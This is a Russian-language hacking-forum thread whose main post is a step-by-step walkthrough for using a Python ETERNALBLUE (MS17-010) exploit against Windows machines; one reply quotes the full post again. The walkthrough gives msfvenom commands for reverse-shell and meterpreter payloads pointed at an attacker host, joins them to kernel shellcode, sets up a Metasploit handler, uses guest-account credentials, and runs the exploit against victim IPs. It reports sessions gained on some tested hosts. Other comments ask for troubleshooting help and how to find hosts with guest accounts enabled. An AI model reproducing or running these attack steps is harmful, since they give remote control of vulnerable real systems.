• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Версия эксплоит ETERNALBLUE на Python.

Z

ZZHup

Вчера (21.08.2017) на секлабе появилась статья с похожим названием, а поскольку дело было вечером и делать было нечего - решил потестить.

И так, инструменты:
Kali Linux
  • NASM
  • Python v2.7
  • Metasploit Framework

Тестируемый хост должен иметь включенную гостевую учетную запись(иначе получите ошибку) или известную пару логин:пароль!

Шелл-код уровня ядра берем здесь:



Проведем два вида атаки:
1. получим обратный шелл через TCP
2. получим сессию в meterpreter.

Готовим начинку:
Сохраняем .аsm файл и компилируем: nasm -f bin kernel_shell_x64.asm.

#msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444

#msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444

Сольем шелл-код и полезную нагрузку в экстазе:
#cat kernel_shell_x64 shell_msf.bin>reverse_shell.bin
#cat kernel_shell_x64 meterpreter_msf.bin>meterpreter.bin


Готовим Metasploit к тесту:
> use exploit/multi/handler
> set PAYLOAD windows/x64/shell/reverse_tcp
> set LHOST IP_ATTACKER
> set LPORT 4444
> exploit
*Started reverse *****
*Started payload *****

(нехай ждет )

Качаем эксплоит от Sleepya. Берем здесь:
.
Сохраняем как exploit.py

Готовим сплойт для тестирования с использованием на тачке с не отключенной гостевой учетной записью.
Ищем в сплойте строки 42 и 43 и заполняем:
USERNAME='Guest'
PASSWORD=' '

(Если известны пара L:p применяем их)

Запускаем:
#python exploit.py <ip_жертвы> reverse_shell.bin 500

После запуска сплойта, получаем сессию в Metasploit.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Аналогично поступаем для создания сессии с meterpreter.

Готовим Метасплоит:

> use exploit/multi/handler
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST IP
> set LPORT 4444
> exploit


Редактируем exploit.py (см. выше)
Стартуем эксплоит:
python exploit.py <ip_жертвы> meterpreter.bin 200


Значение параметра numGroomConn установим в 200 для уменьшения количества соединений
(500 многовато, практически всегда атакуемая машина выпадает в Time-out, оптимально на мой взгляд ставить 300)

Получаем сессию.


ЗЫ: Тестировал на машинах(шт.-15), которые ранее не смог пробить стандартным eternalblue_doublepulsar и ms17_010_eternalblue, результат - примерно на 15-25% хостов(Win7,Win8,Win2012) удалось получить сессию. На других отключены гостевые.​
 

woolf1514

Green Team
06.03.2017
181
191
BIT
1
С пользователя "Guest" тестовую машину не пробил, возможно, UAC помешал, еще разбираюсь. Однако, с другой парой лог/пасс все прошло без проблем! Благодарю за ценную статью!
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
7
Добрый день!

Не совсем понял как склеить нагрузку ) И для чего мы качали шелл-код kernel_shell_x64.asm,далее он нигде не участвует ?
 
T

TST

Вчера (21.08.2017) на секлабе появилась статья с похожим названием, а поскольку дело было вечером и делать было нечего - решил потестить.

И так, инструменты:
Kali Linux
  • NASM
  • Python v2.7
  • Metasploit Framework
Тестируемый хост должен иметь включенную гостевую учетную запись(иначе получите ошибку) или известную пару логин:пароль!

Шелл-код уровня ядра берем здесь:



Проведем два вида атаки:
1. получим обратный шелл через TCP
2. получим сессию в meterpreter.

Готовим начинку:
Сохраняем .аsm файл и компилируем: nasm -f bin kernel_shell_x64.asm.

#msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444

#msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444

Сольем шелл-код и полезную нагрузку в экстазе:
#cat kernel_shell_x64 shell_msf.bin>reverse_shell.bin
#cat kernel_shell_x64 meterpreter_msf.bin>meterpreter.bin


Готовим Metasploit к тесту:
> use exploit/multi/handler
> set PAYLOAD windows/x64/shell/reverse_tcp
> set LHOST IP_ATTACKER
> set LPORT 4444
> exploit
*Started reverse *****
*Started payload *****

(нехай ждет )

Качаем эксплоит от Sleepya. Берем здесь:
.
Сохраняем как exploit.py

Готовим сплойт для тестирования с использованием на тачке с не отключенной гостевой учетной записью.
Ищем в сплойте строки 42 и 43 и заполняем:
USERNAME='Guest'
PASSWORD=' '

(Если известны пара L:p применяем их)

Запускаем:
#python exploit.py <ip_жертвы> reverse_shell.bin 500

После запуска сплойта, получаем сессию в Metasploit.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Аналогично поступаем для создания сессии с meterpreter.

Готовим Метасплоит:

> use exploit/multi/handler
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST IP
> set LPORT 4444
> exploit


Редактируем exploit.py (см. выше)
Стартуем эксплоит:
python exploit.py <ip_жертвы> meterpreter.bin 200


Значение параметра numGroomConn установим в 200 для уменьшения количества соединений
(500 многовато, практически всегда атакуемая машина выпадает в Time-out, оптимально на мой взгляд ставить 300)

Получаем сессию.


ЗЫ: Тестировал на машинах(шт.-15), которые ранее не смог пробить стандартным eternalblue_doublepulsar и ms17_010_eternalblue, результат - примерно на 15-25% хостов(Win7,Win8,Win2012) удалось получить сессию. На других отключены гостевые.​
выдает ошибку при старте эксплойта
Screenshot from 2017-12-04 16-48-13.png
 
H

Heccap

Поясните пожалуйста в чем проблема?
VirtualBox, Kali-Linux, сетевой мост настроил.
 

Вложения

  • MwpmxUI.png
    MwpmxUI.png
    42,4 КБ · Просмотры: 468
F

FuSp

Статья годная, как собственно и все на код eby(не бейте)! Многому научился.
 

gu3st

Green Team
11.02.2018
11
3
BIT
0
Тестируемый хост должен иметь включенную гостевую учетную запись(иначе получите ошибку) или известную пару логин:пароль!
скажите на милость. а как собсна сканить хосты на наличие включенной гостевой?? буду весьма признателен
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!